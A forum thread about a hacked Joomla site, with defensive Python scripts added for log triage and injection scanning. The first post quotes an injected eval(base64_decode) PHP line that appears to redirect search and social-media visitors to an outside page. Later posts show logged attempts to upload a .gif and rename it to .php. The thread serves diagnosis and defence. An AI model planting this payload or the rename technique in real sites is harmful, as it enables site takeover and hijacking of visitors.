  1. #1
    Join Date
    Sep 2013
    Posts
    4

    Help I have been hacked!

    My site has been hacked and I have had Jhackguard installed. Here is the log file!

    Can you help identify the issue? It looks like the log file may have been hacked too! It starts with this PHP.




    #
    #<?php eval(base64_decode("/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaC AoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIp IG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3 Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Ig c3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIX N0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIo JHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYX Rpb246IGh0dHA6Ly93d3cuY2lib25saW5lLm9yZy9jYWNoZS9t b2RfcG9sbC83Yzc0NzhmZGUyZjg5YTIzLnBocCIpOw0KCQlleG l0KCk7DQoJfQ0KfQ0KfQ==")); die('Forbidden.'); ?>
    #Date: 2013-08-30 00:33:55 UTC
    #Software: Joomla Platform 11.4.0 Stable [ Brian Kernighan ] 03-Jan-2012 00:00 GMT

  2. #2
    Join Date
    Sep 2013
    Location
    Prague
    Posts
    2

    Contact your hosting provider and they will give you assistance.

  3. #3

    Hi Martsax,

    Could you please keep us informed whether you found a solution?

    Thanks in advance.

  4. #4
    Join Date
    Sep 2013
    Posts
    4

    My hosting provider hasn't been able to identify any issues on their side of things. The string in my first post had been added to Joomla configuration.php and 4 files in the libraries directory and the jhackguard log file. Is there anything I can change in Jhackguard to prevent this?

  5. #5

    The cause of this issue is most probably using an outdated Joomla version or plugin that allows the attacker to compromise your website. This is where you should start looking. Update your installation to the latest stable version and check the plugins (components and modules) you use.

  6. #6
    Join Date
    Sep 2013
    Posts
    4

    I think I have cleaned out all the infected files now and managed to repel the attacks so far. I had these entries in the logfiles yesterday and nothing since. Do you have any information on how to interpret the logs?


    2013-11-07T07:15:56+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-07T07:15:56+00:00 CRITICAL jhackguard Changed POST value from:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name=\"action\"

    upload to:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name="action"

    upload
    2013-11-07T07:38:32+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-07T07:38:32+00:00 CRITICAL jhackguard Changed POST value from:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name=\"action\"

    upload to:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name="action"

    upload
    2013-11-07T08:34:58+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-07T08:34:58+00:00 CRITICAL jhackguard Changed POST value from:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name=\"action\"

    upload to:ViAr
    -----------------------------41184676334
    Content-Disposition: form-data; name="action"

    upload

  7. #7

    This means that someone is first uploading a .gif file then trying to change its name to .php, therefore making it executable. This is certainly an attempt to compromise your website.
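
    An added example, not part of the original thread and not jHackGuard code: one way to triage log entries like the ones above is to parse the `folderRename` call out of each one-line entry and count renames whose target extension is executable while the source extension is not. The extension list and the function name are assumptions; the sample lines are copied from the log excerpts in this thread.

```python
import json
import re
from pathlib import PurePosixPath

# Extensions a PHP host commonly executes (assumed list; match it to the server's handlers).
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# One-line jHackGuard entries of the form shown in the thread.
ENTRY = re.compile(
    r"^(?P<ts>\S+) [A-Z]+ jhackguard Changed POST value "
    r"from:.*? to:(?P<after>\{.*\})\s*$"
)

# Lines copied from the thread's log excerpts.
SAMPLE = r'''
2013-11-07T07:15:56+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
2013-11-07T07:15:56+00:00 CRITICAL jhackguard Changed POST value from:ViAr
-----------------------------41184676334
Content-Disposition: form-data; name=\"action\"
2013-11-07T07:38:32+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
2013-11-08T12:13:48+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/iam.gif\",\"localhost.php\"]} to:{"fn":"folderRename","args":["/iam.gif","localhost.php"]}
2013-11-10T06:47:52+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/config.inc.gif\",\"config.inc.php\"]} to:{"fn":"folderRename","args":["/config.inc.gif","config.inc.php"]}
'''

def suspicious_renames(log_text):
    """Map (source, target) -> count/first/last for renames into an executable extension."""
    hits = {}
    for line in log_text.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue  # multipart continuation lines and headers carry no rename call
        try:
            call = json.loads(m.group("after"))
        except ValueError:
            continue
        if not isinstance(call, dict) or call.get("fn") != "folderRename":
            continue
        args = call.get("args")
        if not isinstance(args, list) or len(args) != 2:
            continue
        src, dst = str(args[0]), str(args[1])
        src_ext = PurePosixPath(src).suffix.lower()
        dst_ext = PurePosixPath(dst).suffix.lower()
        if dst_ext in EXECUTABLE_EXTS and src_ext not in EXECUTABLE_EXTS:
            rec = hits.setdefault((src, dst), {"count": 0, "first": m.group("ts")})
            rec["count"] += 1
            rec["last"] = m.group("ts")
    return hits

if __name__ == "__main__":
    for (src, dst), rec in suspicious_renames(SAMPLE).items():
        print(f"{rec['count']}x {src} -> {dst}  first={rec['first']} last={rec['last']}")
```

    The entries only record that jHackGuard rewrote the POST value, so a hit here is a reason to check on disk whether the target file exists, not proof that the rename was blocked.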

  8. #8
    Join Date
    Sep 2013
    Posts
    4

    I have since had these reports from Jhackguard. Is it repelling the attack?

    2013-11-08T12:13:48+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/iam.gif\",\"localhost.php\"]} to:{"fn":"folderRename","args":["/iam.gif","localhost.php"]}
    2013-11-08T12:14:07+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/iam.gif\",\"localhost.php\"]} to:{"fn":"folderRename","args":["/iam.gif","localhost.php"]}
    2013-11-09T14:40:57+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T14:40:57+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T15:15:22+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T15:15:22+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T15:18:47+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:29:33+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:29:33+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:50:28+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-09T17:50:33+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/ViAr.gif\",\"ViAr.php\"]} to:{"fn":"folderRename","args":["/ViAr.gif","ViAr.php"]}
    2013-11-10T06:47:52+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/config.inc.gif\",\"config.inc.php\"]} to:{"fn":"folderRename","args":["/config.inc.gif","config.inc.php"]}
    2013-11-10T06:47:53+00:00 CRITICAL jhackguard Changed POST value from:{\"fn\":\"folderRename\",\"args\":[\"/config.inc.gif\",\"config.inc.php\"]} to:{"fn":"folderRename","args":["/config.inc.gif","config.inc.php"]}

  9. #9

    Yes, but I would still advise you to consider immediately upgrading your Joomla installations along with all plugins you are using, verify their integrity and thoroughly scan your website for exploits.
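
    An added example, not part of the original thread: a small scanner for the kind of injected line quoted in the first post (`eval(base64_decode("..."))`), which the poster found in configuration.php, files under libraries and the log file. It walks a site directory, tolerates whitespace inside the base64 string, and reports which redirect-related strings appear in the decoded payload. The marker list, file extensions and function names are assumptions.

```python
import base64
import binascii
import os
import re

# Shape of the injected line quoted in the thread: eval(base64_decode("...")).
INJECTION = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)\s*\)"
)
# Strings suggesting a referrer-based redirect in the decoded payload (assumed indicator list).
REDIRECT_MARKERS = (b"header(", b"Location:", b"$referer")

def decode_payload(blob):
    """Decode a base64 blob that may contain whitespace added by editors or line wrapping."""
    compact = b"".join(blob.split())
    compact += b"=" * (-len(compact) % 4)  # restore padding if it was cut off
    try:
        return base64.b64decode(compact)
    except (binascii.Error, ValueError):
        return b""

def scan_tree(root, exts=(".php", ".log")):
    """Return one finding per injected eval(base64_decode(...)) call under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            for m in INJECTION.finditer(data):
                decoded = decode_payload(m.group(1))
                findings.append({
                    "path": os.path.relpath(path, root),
                    "line": data.count(b"\n", 0, m.start()) + 1,
                    "markers": [k.decode() for k in REDIRECT_MARKERS if k in decoded],
                })
    return findings

if __name__ == "__main__":
    import sys
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{f['path']}:{f['line']} markers={f['markers']}")
```

    A clean scan does not replace comparing the installation against a fresh copy of the same Joomla release, since other backdoors need not use this pattern.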
